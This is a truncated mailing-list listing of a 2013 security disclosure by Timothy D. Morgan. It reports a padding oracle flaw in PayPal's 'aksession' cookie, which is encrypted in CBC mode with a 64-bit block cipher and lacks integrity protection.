Back to list
*Note: Email address will appear as "user domain ext" to prevent harvesting.
PayPal's "invalid" aksession Padding Oracle Flaw
Sep 03 2013 02:15PM
Timothy D. Morgan (tmorgan vsecurity com)
Re-posting this, since the moderators ignored it (and my follow up emails to them).
The main PayPal web site sets a cookie named "aksession" which
contains a blob of base64-encoded ciphertext. This ciphertext is
encrypted using a 64-bit block cipher in CBC mode and does not have
any other integrit...
[ more ]
Copyright 2010, SecurityFocus